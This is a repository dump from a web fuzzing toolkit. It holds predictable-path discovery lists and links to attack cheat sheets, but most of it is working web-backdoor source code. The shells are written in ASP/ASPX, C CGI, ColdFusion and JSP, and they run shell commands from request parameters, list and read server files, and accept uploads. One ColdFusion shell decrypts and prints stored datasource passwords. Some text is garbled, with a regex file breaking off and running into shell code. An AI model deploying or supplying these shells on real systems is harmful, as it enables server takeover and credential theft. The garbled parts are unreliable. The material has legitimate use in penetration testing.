6 | 7 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/Ruby_Rails.txt: -------------------------------------------------------------------------------- 1 | .gitignore 2 | Gemfile 3 | README 4 | README.rdoc 5 | Rakefile 6 | app 7 | app/assets/images/rails.png 8 | app/assets/javascripts/application.js 9 | app/assets/stylesheets/application.css 10 | app/controllers 11 | app/controllers/admin_controller.rb 12 | app/controllers/application.rb 13 | app/controllers/application_controller.rb 14 | app/helpers/application_helper.rb 15 | app/mailers 16 | app/mailers/.gitkeep 17 | app/models 18 | app/models/.gitkeep 19 | app/views/layouts/application.html.erb 20 | config 21 | config.ru 22 | config/application.rb 23 | config/boot.rb 24 | config/database.yml 25 | config/deploy.rb 26 | config/environment.rb 27 | config/environments 28 | config/environments/development.rb 29 | config/environments/production.rb 30 | config/environments/test.rb 31 | config/initializers 32 | config/initializers/backtrace_silencers.rb 33 | config/initializers/inflections.rb 34 | config/initializers/mime_types.rb 35 | config/initializers/secret_token.rb 36 | config/initializers/session_store.rb 37 | config/initializers/wrap_parameters.rb 38 | config/locales 39 | config/locales/en.yml 40 | config/routes.rb 41 | core 42 | create 43 | db 44 | db/seeds.rb 45 | dispatch.cgi 46 | dispatch.fcgi 47 | dispatch.rb 48 | doc 49 | doc/README_FOR_APP 50 | lib 51 | lib/assets 52 | lib/assets/.gitkeep 53 | lib/tasks 54 | lib/tasks/.gitkeep 55 | log 56 | log/.gitkeep 57 | log/development.log 58 | log/production.log 59 | log/server.log 60 | log/test.log 61 | public 62 | public/404.html 63 | public/422.html 64 | public/500.html 65 | public/favicon.ico 66 | public/index.html 67 | public/robots.txt 68 | rails 69 | rails/info 70 | rails/info/properties 71 | script 72 | script/about 73 | script/console 74 | script/dbconsole 75 | 
script/destroy 76 | script/generate 77 | script/performance 78 | script/performance/benchmarker 79 | script/performance/profiler 80 | script/performance/request 81 | script/plugin 82 | script/process 83 | script/process/inspector 84 | script/process/reaper 85 | script/process/spawner 86 | script/rails 87 | script/runner 88 | script/server 89 | stdlib 90 | test/fixtures 91 | test/fixtures/.gitkeep 92 | test/functional 93 | test/functional/.gitkeep 94 | test/integration 95 | test/integration/.gitkeep 96 | test/performance/browsing_test.rb 97 | test/test_helper.rb 98 | test/unit 99 | test/unit/.gitkeep 100 | tmp/cache 101 | tmp/cache/assets 102 | vendor/assets/javascripts 103 | vendor/assets/javascripts/.gitkeep 104 | vendor/assets/stylesheets 105 | vendor/assets/stylesheets/.gitkeep 106 | vendor/plugins 107 | vendor/plugins/.gitkeep 108 | app/views/home/index.html.erb 109 | assets/application.css 110 | assets/jquery.js 111 | assets/application.js 112 | assets/home.css 113 | assets/home.js 114 | posts 115 | posts/new 116 | posts/1/edit 117 | posts.json 118 | javascripts/application.js 119 | javascripts/prototype.js 120 | stylesheets/application.css 121 | images/rails.png 122 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/SiteMinder.txt: -------------------------------------------------------------------------------- 1 | /iam/ 2 | /iam/siteminder/ 3 | /sitemindermonitor/ 4 | /sitemindermonitor/doConfig.jsp 5 | /sitemindermonitor/doSave.jsp 6 | /sitemindermonitor/readfile.jsp 7 | /siteminder/ 8 | /siteminder/monitor/ 9 | /siteminder/monitor/settings 10 | /doConfig.jsp 11 | /doSave.jsp 12 | /readfile.jsp 13 | /siteminderagent/ 14 | /siteminderagent/pwcgi/ 15 | /siteminderagent/pwcgi/smpwservicescgi.exe 16 | /auth/ 17 | /servlet/ 18 | /servlet/DateServlet 19 | /servlet/TestServlet 20 | -------------------------------------------------------------------------------- 
/fuzzdb/discovery/predictable-filepaths/webservers-appservers/SunAppServerGlassfish.txt: -------------------------------------------------------------------------------- 1 | /BasicAuthServlet 2 | /CertAuthServlet 3 | /cgi-bin 4 | /cgi-bin/gx.cgi 5 | /cgi-bin/gx.dll 6 | /cgi-bin/gx.exe 7 | /classes 8 | /com.netscape.server.servlet.jsp.JSPRunner 9 | /COnlineBank 10 | /CSample 11 | /ExceptionThrown.jsp 12 | /FormAuthServlet 13 | /fortune 14 | /gx 15 | /GXApp 16 | /GXApp/COnlineBank 17 | /GXApp/COnlineBank/COBLogin.html 18 | /GXApp/CSample 19 | /GXApp/CSample/index.html 20 | /GXApp/images 21 | /GXApp/index.html 22 | /GXApp/OnlineBank 23 | /GXApp/OnlineBank/OBLogin.html 24 | /gx.cgi 25 | /gx.exe 26 | /ias-samples 27 | /ias-samples/index.html 28 | /index.html 29 | /JSPRunner 30 | /JSPRunnerSticky 31 | /lotery 32 | /NASApp 33 | /NASApp/fortune/fortune 34 | /NASApp/system 35 | /NASApp/system/BasicAuthServlet 36 | /NASApp/system/CertAuthServlet 37 | /NASApp/system/ExceptionThrown.jsp 38 | /NASApp/system/FormAuthServlet 39 | /NASApp/system/JSPRunner 40 | /NASApp/system/JSPRunnerSticky 41 | /NASApp/system/SessionInvalidator 42 | /NASApp/system/StaticServlet 43 | /NASApp/system/ValidationError.jsp 44 | /NASApp/system/WelcomeListServlet 45 | /OnlineBank 46 | /servlet 47 | /SessionInvalidator 48 | /StaticServlet 49 | /system 50 | /ValidationError.jsp 51 | /WelcomeListServlet 52 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/SuniPlanet.txt: -------------------------------------------------------------------------------- 1 | ?Publisher 2 | ?wp-cs-dump 3 | ?wp-html-rend 4 | ?wp-start-ver 5 | ?wp-stop-ver 6 | ?wp-uncheckout 7 | ?wp-usr-prop 8 | ?wp-ver-diff 9 | ?wp-ver-info 10 | ?wp-verify-link 11 | admin-serv 12 | admin-serv/config/admpw 13 | admpw 14 | agents 15 | bin 16 | ca 17 | cgi-bin 18 | config 19 | dirb_random.cgi 20 | dirb_random.jsp 21 | dirb_random.shtml 22 | docs 23 | dsgw 
24 | help 25 | index.html 26 | jsp 27 | manual 28 | mc-icons 29 | netshare 30 | ns-icons 31 | publisher 32 | search 33 | search-ui 34 | servlet 35 | servlets 36 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/webservers-appservers/Vignette.txt: -------------------------------------------------------------------------------- 1 | /0,,,00 2 | /0,,,00.html 3 | /1,,,00 4 | /1,,,00.html 5 | /CDA 6 | /CDS 7 | /CMA 8 | /CMS 9 | /Deleting 10 | /Docs 11 | /Editing 12 | /HOME 13 | /Images 14 | /Internal 15 | /MetaDataUpdate 16 | /Report 17 | /Select 18 | /StoryServer 19 | /TMT 20 | /VGN 21 | /XML 22 | /ac 23 | /allvars 24 | /asp 25 | /aspstatus 26 | /cda 27 | /cds 28 | /cma 29 | /cms 30 | /controller 31 | /diag 32 | /docs 33 | /edit 34 | /error 35 | /errorpage 36 | /errors 37 | /executequery 38 | /external 39 | /home 40 | /ibm 41 | /initialize 42 | /internal 43 | /jsp 44 | /jspstatus 45 | /jsptest 46 | /legacy 47 | /license 48 | /listcolumns 49 | /login 50 | /loginlogo 51 | /logo 52 | /main 53 | /menu 54 | /metadataupdate 55 | /performance 56 | /portal 57 | /ppstats 58 | /preview 59 | /previewer 60 | /record 61 | /reset 62 | /save 63 | /stat 64 | /status 65 | /storyserver 66 | /style 67 | /stylepreviewer 68 | /utils 69 | /vdc 70 | /vgn 71 | /vr 72 | /Ping.jsp 73 | /HelloWorld.jsp 74 | -------------------------------------------------------------------------------- /fuzzdb/discovery/predictable-filepaths/wellknown-rfc5785.txt: -------------------------------------------------------------------------------- 1 | .well-known/ 2 | .well-known/acme-challenge 3 | .well-known/apple-app-site-association 4 | .well-known/apple-developer-merchant-domain-association 5 | .well-known/ashrae 6 | .well-known/assetlinks.json 7 | .well-known/browserid 8 | .well-known/caldav 9 | .well-known/carddav 10 | .well-known/core 11 | .well-known/csvm 12 | .well-known/dnt 13 | .well-known/dnt-policy.txt 14 | .well-known/est 15 | 
.well-known/genid 16 | .well-known/hoba 17 | .well-known/host-meta 18 | .well-known/host-meta.json 19 | .well-known/keybase.txt 20 | .well-known/ni 21 | .well-known/openid-configuration 22 | .well-known/openorg 23 | .well-known/posh 24 | .well-known/reload-config 25 | .well-known/repute-template 26 | .well-known/stun-key 27 | .well-known/time 28 | .well-known/timezone 29 | .well-known/void 30 | .well-known/webfinger 31 | -------------------------------------------------------------------------------- /fuzzdb/docs/attack-docs/remote-cmd-exfiltration/Web-Shells-rev2.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/docs/attack-docs/remote-cmd-exfiltration/Web-Shells-rev2.pdf -------------------------------------------------------------------------------- /fuzzdb/docs/attack-docs/remote-cmd-exfiltration/netcat_cheat_sheet_v1.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/docs/attack-docs/remote-cmd-exfiltration/netcat_cheat_sheet_v1.pdf -------------------------------------------------------------------------------- /fuzzdb/docs/attack-docs/remote-cmd-exfiltration/windows_command_line_sheet_v1.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/docs/attack-docs/remote-cmd-exfiltration/windows_command_line_sheet_v1.pdf -------------------------------------------------------------------------------- /fuzzdb/docs/attack-docs/source-directory-file-indexing-cheatsheet.html: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/docs/attack-docs/source-directory-file-indexing-cheatsheet.html -------------------------------------------------------------------------------- /fuzzdb/docs/attack-docs/sqli/docs.oracle_cheat.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/docs/attack-docs/sqli/docs.oracle_cheat.pdf -------------------------------------------------------------------------------- /fuzzdb/docs/attack-docs/xss/docs.wasc-scriptmapping/images/ff2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/docs/attack-docs/xss/docs.wasc-scriptmapping/images/ff2.png -------------------------------------------------------------------------------- /fuzzdb/docs/attack-docs/xss/docs.wasc-scriptmapping/images/ie7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/docs/attack-docs/xss/docs.wasc-scriptmapping/images/ie7.png -------------------------------------------------------------------------------- /fuzzdb/docs/attack-docs/xss/docs.wasc-scriptmapping/images/safari3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/docs/attack-docs/xss/docs.wasc-scriptmapping/images/safari3.png -------------------------------------------------------------------------------- /fuzzdb/docs/misc/Web-Shells-rev2.pdf: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/docs/misc/Web-Shells-rev2.pdf -------------------------------------------------------------------------------- /fuzzdb/docs/misc/Wireshark_Display_Filters.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/docs/misc/Wireshark_Display_Filters.pdf -------------------------------------------------------------------------------- /fuzzdb/regex/README.md: -------------------------------------------------------------------------------- 1 | lists of error messages for regex matching: 2 | Search all output pages generated by fuzzing payloads for the extensive list of known error strings, for later analysis. 3 | usage docs: 4 | https://github.com/fuzzdb-project/fuzzdb/wiki/regexerrors 5 | 6 | breakpoint-ignores.txt 7 | List of common URLS which can be annoying while in a web proxy's breakpoint mode. 8 | -------------------------------------------------------------------------------- /fuzzdb/regex/amazon.txt: -------------------------------------------------------------------------------- 1 | (? "") Then 15 | szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" & oFSys.GetTempName() 16 | ' Here we do the command 17 | Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF & 18 | """",0,True) 19 | response.write szTF 20 | ' Change perms 21 | Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G 22 | everyone:F",0,True) 23 | Set oF = oFSys.OpenTextFile(szTF,1,False,0) 24 | End If 25 | %> 26 |
" method="POST"> 27 | 28 |
29 | Machine: <%=oSNet.ComputerName%>
30 | Username: <%=oSNet.UserName%>
31 | <% 32 | If (IsObject(oF)) Then 33 | On Error Resume Next 34 | Response.Write Server.HTMLEncode(oF.ReadAll) 35 | oF.Close 36 | Call oS.Run("win.com cmd.exe /c del "& szTF,0,True) 37 | End If 38 | 39 | %> 40 | 41 | 42 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/asp/cmd.asp: -------------------------------------------------------------------------------- 1 | 11 | 12 | <% 13 | Set oScript = Server.CreateObject("WSCRIPT.SHELL") 14 | Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 15 | Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 16 | 17 | szCMD = request("cmd") 18 | 19 | If (szCMD <> "") Then 20 | szTempFile = "C:\" & oFileSys.GetTempName( ) 21 | Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 22 | Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 23 | End If 24 | %> 25 | 26 | 27 | 28 |
29 | 30 | 31 |
32 |
33 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
34 | 
35 | <% 36 | If (IsObject(oFile)) Then 37 | On Error Resume Next 38 | Response.Write Server.HTMLEncode(oFile.ReadAll) 39 | oFile.Close 40 | Call oFileSys.DeleteFile(szTempFile, True) 41 | End If 42 | %> 43 | 44 | 45 | 46 | 47 | 48 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/asp/cmd.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="VB" Debug="true" %> 2 | <%@ import Namespace="system.IO" %> 3 | <%@ import Namespace="System.Diagnostics" %> 4 | 5 | 25 | 26 | 27 | 28 |
29 |

Program 30 | c:\windows\system32\cmd.exe 31 |

Arguments 32 | /c net user 33 |

34 |

35 |

36 | 37 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/asp/cmdasp.asp: -------------------------------------------------------------------------------- 1 | <%@ Language=VBScript %> 2 | <% 3 | ' --------------------o0o-------------------- 4 | ' File: CmdAsp.asp 5 | ' Author: Maceo 6 | ' Release: 2000-12-01 7 | ' OS: Windows 2000, 4.0 NT 8 | ' ------------------------------------------- 9 | 10 | Dim oScript 11 | Dim oScriptNet 12 | Dim oFileSys, oFile 13 | Dim szCMD, szTempFile 14 | 15 | On Error Resume Next 16 | 17 | ' -- create the COM objects that we will be using -- ' 18 | Set oScript = Server.CreateObject("WSCRIPT.SHELL") 19 | Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 20 | Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 21 | 22 | ' -- check for a command that we have posted -- ' 23 | szCMD = Request.Form(".CMD") 24 | If (szCMD <> "") Then 25 | 26 | ' -- Use a poor man's pipe ... a temp file -- ' 27 | szTempFile = "C:\" & oFileSys.GetTempName( ) 28 | Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 29 | Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 30 | 31 | End If 32 | 33 | %> 34 | 35 | 36 |
" method="POST"> 37 | 38 | 39 |
40 |
41 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
42 | 
43 | <% 44 | If (IsObject(oFile)) Then 45 | ' -- Read the output from our command and remove the temp file -- ' 46 | On Error Resume Next 47 | Response.Write Server.HTMLEncode(oFile.ReadAll) 48 | oFile.Close 49 | Call oFileSys.DeleteFile(szTempFile, True) 50 | End If 51 | %> 52 | 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/asp/cmdasp.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" Debug="true" Trace="false" %> 2 | <%@ Import Namespace="System.Diagnostics" %> 3 | <%@ Import Namespace="System.IO" %> 4 | 28 | 29 | 30 | awen asp.net webshell 31 | 32 | 33 |
34 | 35 | 36 | Command: 37 |
38 | 39 | 40 | 41 | 42 | 43 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/asp/list.asp: -------------------------------------------------------------------------------- 1 | 11 | 12 | 13 | 14 | 15 | <% 16 | 17 | file=request("file") 18 | tipo=request("type") 19 | 20 | If file="" then 21 | file="c:\" 22 | tipo="1" 23 | End If 24 | 25 | %> 26 | 27 | 28 |
29 | 30 | 31 | 32 |
33 | 34 | 35 | <% 36 | 37 | If tipo="1" then 38 | Response.Write("

PATH: " & file & "

") 39 | ListFolder(file) 40 | End If 41 | 42 | If tipo="2" then 43 | Response.Write("

FILE: " & file & "

") 44 | 45 | Set oStr = server.CreateObject("Scripting.FileSystemObject") 46 | Set oFich = oStr.OpenTextFile(file, 1) 47 | 48 | Response.Write("
--
") 49 | 50 | Response.Write(oFich.ReadAll) 51 | 52 | Response.Write("
--
") 53 | 54 | End If 55 | %> 56 | 57 | <% 58 | 59 | sub ListFolder(path) 60 | 61 | set fs = CreateObject("Scripting.FileSystemObject") 62 | set folder = fs.GetFolder(path) 63 | 64 | Response.Write("
( ) " & ".." & "" & vbCrLf) 65 | 66 | for each item in folder.SubFolders 67 | Response.Write("
( ) " & item.Name & "" & vbCrLf) 68 | next 69 | 70 | for each item in folder.Files 71 | Response.Write("
  • " & item.Name & " - " & item.Size & " bytes, " & "
  • " & vbCrLf) 72 | next 73 | 74 | end sub 75 | 76 | %> 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/asp/list.txt: -------------------------------------------------------------------------------- 1 | 11 | 12 | 13 | 14 | 15 | <% 16 | 17 | file=request("file") 18 | tipo=request("type") 19 | 20 | If file="" then 21 | file="c:\" 22 | tipo="1" 23 | End If 24 | 25 | %> 26 | 27 | 28 |
    29 | 30 | 31 | 32 |
    33 | 34 | 35 | <% 36 | 37 | If tipo="1" then 38 | Response.Write("

    PATH: " & file & "

    ") 39 | ListFolder(file) 40 | End If 41 | 42 | If tipo="2" then 43 | Response.Write("

    FILE: " & file & "

    ") 44 | 45 | Set oStr = server.CreateObject("Scripting.FileSystemObject") 46 | Set oFich = oStr.OpenTextFile(file, 1) 47 | 48 | Response.Write("
    --
    ") 49 | 50 | Response.Write(oFich.ReadAll) 51 | 52 | Response.Write("
    --
    ") 53 | 54 | End If 55 | %> 56 | 57 | <% 58 | 59 | sub ListFolder(path) 60 | 61 | set fs = CreateObject("Scripting.FileSystemObject") 62 | set folder = fs.GetFolder(path) 63 | 64 | Response.Write("
    ( ) " & ".." & "" & vbCrLf) 65 | 66 | for each item in folder.SubFolders 67 | Response.Write("
    ( ) " & item.Name & "" & vbCrLf) 68 | next 69 | 70 | for each item in folder.Files 71 | Response.Write("
  • " & item.Name & " - " & item.Size & " bytes, " & "
  • " & vbCrLf) 72 | next 73 | 74 | end sub 75 | 76 | %> 77 | 78 | 79 | 80 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/asp/ntdaddy.asp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/web-backdoors/asp/ntdaddy.asp -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/c/cmd.c: -------------------------------------------------------------------------------- 1 | // 2 | // cmdcgi.exe 0.1 darkraver (12/05/2005) 3 | // 4 | 5 | #include 6 | 7 | 8 | char *uri_decode(char *uri) { 9 | int i=0; 10 | int ptr=0; 11 | char *command; 12 | char hexa[3]; 13 | char code; 14 | 15 | command=(char *)malloc(strlen(uri)); 16 | 17 | for(i=0;i\n"); 53 | 54 | cmd=(char *)getenv("QUERY_STRING"); 55 | 56 | if(!cmd || strlen(cmd)==0) { 57 | printf("

    "); 58 | printf(""); 59 | printf(""); 60 | printf("


    "); 61 | } else { 62 | //printf("QUERY_STRING: %s\n", cmd); 63 | cmd+=4; 64 | cmd=uri_decode(cmd); 65 | printf("

    COMMAND: %s


    \n", cmd);
    66 |     fflush(stdout);
    67 |     execl("/bin/sh", "/bin/sh", "-c", cmd, 0);
    68 |     }
    69 | 
    70 | }
    71 | 
    72 | 
    73 | 
    74 | 
    75 | 
    
    
    --------------------------------------------------------------------------------
    /fuzzdb/web-backdoors/cfm/cfExec.cfm:
    --------------------------------------------------------------------------------
     1 | 
     2 | 
     3 | 
     4 | 
     5 | 
     6 | Notes:
    7 |
      8 |
    • For Windows put this as command "c:\windows\system32\cmd.exe /c" or wherever cmd.exe is
      9 |
    • For Windows options are the command you want to run "dir" "type" etc 10 |
    11 |

    12 | 13 | 14 | 15 | 16 | 18 | 20 | 23 |
    Command:value="#form.cmd#">
    Options: value="#form.opts#">
    Timeout: value="#form.timeout#" 22 | value="5">
    24 | 25 | 26 | 27 | 28 | 29 | 32 | 33 | 34 |

    35 | #HTMLCodeFormat(myVar)#
    36 | 
    37 | 38 | 39 | 40 | //The following code borrowed from hernanOchoa @hexale (thx) 41 | //added better formatting on output and connection string [lb] 42 | 43 | // Create Data Source Object 44 | dataSourceObb=createobject("java","coldfusion.server.ServiceFactory"). 45 | getDatasourceService().getDatasources(); 46 | writeoutput("

    Datasource Credentials:
    "); 47 | writeoutput(""); 48 | // Loop Through DataSources 49 | for(i in dataSourceObb) { 50 | if(len(dataSourceObb[i]["password"])){ 51 | 52 | // Get url 53 | theurl=(dataSourceObb[i]["url"]); 54 | 55 | // Get username 56 | username=(dataSourceObb[i]["username"]); 57 | 58 | // Get and decrypt password 59 | decryptPassword=Decrypt(dataSourceObb[i]["password"], 60 | generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede", 61 | "Base64"); 62 | 63 | // Output datasource usernames, passwords, and urls 64 | writeoutput("" & 65 | "" & 66 | "" & 67 | ""); 69 | } 70 | } 71 | writeoutput("
    DataSource: " & i & "Username: " & username & "Password: " & decryptPassword & 68 | "URL: " & theurl & "

    "); 72 |
    73 | 74 | 75 | 76 | 77 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/cfm/cfSQL.cfm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 |

    Notes:

    10 |
      11 |
    • Select the database you want to use
    • 12 |
    • Write SQL statements in the text box
    • 13 |
    14 | 15 |
    16 |

    SQL Interface:

    17 | Datasource
    18 | 27 | 28 |
    29 | SQL
    30 | 31 |
    32 | 33 |
    34 | 35 | 36 | 37 | #Form.sql# 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 |
    #column#
    #runsql[column][row]#
    60 | 61 | 62 | 63 | 64 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/cfm/cmd.cfm: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 |
    Command: < input type=text name="cmd" size=50 value="#form.cmd#" > < br>
    Options: < input type=text name="opts" size=50 value="#form.opts#" >< br>
    Timeout:< input type=text name="timeout" size=4 value="#form.timeout#" value="5" >
    20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 |
    28 | #myVar#
    29 | 
    30 |
    31 | 32 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/exe/nc.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/web-backdoors/exe/nc.exe -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/jsp/CmdServlet.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/web-backdoors/jsp/CmdServlet.class -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/jsp/CmdServlet.java: -------------------------------------------------------------------------------- 1 | /* 2 | * CmdServlet.java 20/01/2004 3 | * 4 | * @author The Dark Raver 5 | * @version 0.1 6 | */ 7 | 8 | import java.io.*; 9 | import javax.servlet.*; 10 | import javax.servlet.http.*; 11 | 12 | 13 | public class CmdServlet extends HttpServlet { 14 | 15 | public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { 16 | res.setContentType("text/html"); 17 | 18 | PrintWriter out = res.getWriter(); 19 | out.print(""); 20 | out.print("

    "); 21 | out.print(""); 22 | out.print(""); 23 | out.print("
    "); 24 | 25 | if(req.getParameter("cmd") != null) { 26 | out.print("\n

    Command: " + req.getParameter("cmd") + "\n


    \n");
    27 | 	        Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
    28 | 	        DataInputStream procIn = new DataInputStream(p.getInputStream());
    29 | 			int c='\0';
    30 |         	while ((c=procIn.read()) != -1) {
    31 | 				out.print((char)c);
    32 | 				}
    33 | 	        }
    34 | 
    35 | 		out.print("\n
    "); 36 | out.print(""); 37 | } 38 | 39 | public String getServletInfo() { 40 | return "CmdServlet 0.1"; 41 | } 42 | 43 | } 44 | -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/jsp/ListServlet.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/web-backdoors/jsp/ListServlet.class -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/jsp/ListServlet.java: -------------------------------------------------------------------------------- 1 | /* 2 | * ListServlet.java 3 | * 4 | * @author Sierra 5 | * @version 0.1 6 | */ 7 | 8 | import java.io.*; 9 | import javax.servlet.ServletException; 10 | import javax.servlet.http.*; 11 | 12 | public class ListServlet extends HttpServlet 13 | { 14 | 15 | 16 | public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { 17 | PrintWriter printwriter = res.getWriter(); 18 | String path = req.getParameter("file"); 19 | 20 | printwriter.write("\n\nDirectory Listing\n\n\n"); 21 | printwriter.write("\n"); 22 | if(req.getParameter("file")==null) path = "c:\\"; 23 | printwriter.write("

    Path: " + path + "


    \n");
    24 | 		// Review note: path is the raw "file" request parameter (or the drive root when it is absent); the visible code applies no canonicalisation or base-directory restriction before building the File.
    25 | 		File file = new File(path);
    26 | 		// A directory is enumerated entry by entry; any other readable path is streamed back to the client further down in this method.
    27 | 		if(file.isDirectory())
    28 | 		{
    29 | 			String s = new String("Unknown");
    30 | 			String s2 = new String("Black");
    31 | 			File afile[] = file.listFiles();
    32 | 			for(int i = 0; i < afile.length; i++)
    33 | 			{
    34 | 				String s1 = new String(afile[i].toString()); // path string of the entry as File.toString() reports it
    35 | 				printwriter.write("("); // each entry is prefixed with a three-character flag group: type, readable, writable
    36 | 				String s3;
    37 | 				if(afile[i].isDirectory()) // type flag: "d" directory, "-" regular file, "?" anything else
    38 | 				{
    39 | 					printwriter.write("d");
    40 | 					s1 = s1 + "/";
    41 | 					s3 = new String("Blue");
    42 | 				} else
    43 | 				if(afile[i].isFile())
    44 | 				{
    45 | 					printwriter.write("-");
    46 | 					s3 = new String("Green");
    47 | 				} else
    48 | 				{
    49 | 					printwriter.write("?");
    50 | 					s3 = new String("Red");
    51 | 				}
    52 | 				if(afile[i].canRead()) // "r"/"w" report what the servlet container's own account may do with the entry
    53 | 					printwriter.write("r");
    54 | 				else
    55 | 					printwriter.write("-");
    56 | 				if(afile[i].canWrite())
    57 | 					printwriter.write("w");
    58 | 				else
    59 | 					printwriter.write("-");
    60 | 				printwriter.write(") " + s1.toString() + " " + "( Size: " + afile[i].length() + " bytes )
    \n"); 61 | } 62 | 63 | printwriter.write("
    "); 64 | } else 65 | if(file.canRead()) 66 | { 67 | FileInputStream fileinputstream = new FileInputStream(file); 68 | int j = 0; 69 | while(j >= 0) 70 | { 71 | j = fileinputstream.read(); 72 | printwriter.write(j); 73 | } 74 | fileinputstream.close(); 75 | } else 76 | { 77 | printwriter.write("Can't Read file
    "); 78 | } 79 | 80 | } 81 | 82 | 83 | public String getServletInfo() { 84 | return "Directory Listing"; 85 | } 86 | } -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/jsp/UpServlet.class: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/web-backdoors/jsp/UpServlet.class -------------------------------------------------------------------------------- /fuzzdb/web-backdoors/jsp/UpServlet.java: -------------------------------------------------------------------------------- 1 | /* 2 | * UpServlet.java 29/04/2005 3 | * 4 | * @author The Dark Raver 5 | * @version 0.1 6 | */ 7 | 8 | import java.io.*; 9 | import javax.servlet.*; 10 | import javax.servlet.http.*; 11 | 12 | 13 | public class UpServlet extends HttpServlet { 14 | 15 | public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { 16 | res.setContentType("text/html"); 17 | PrintWriter out = res.getWriter(); 18 | out.print(""); 19 | out.print("
    "); 20 | out.print("UPLOAD "); 21 | out.print(""); 22 | out.print("
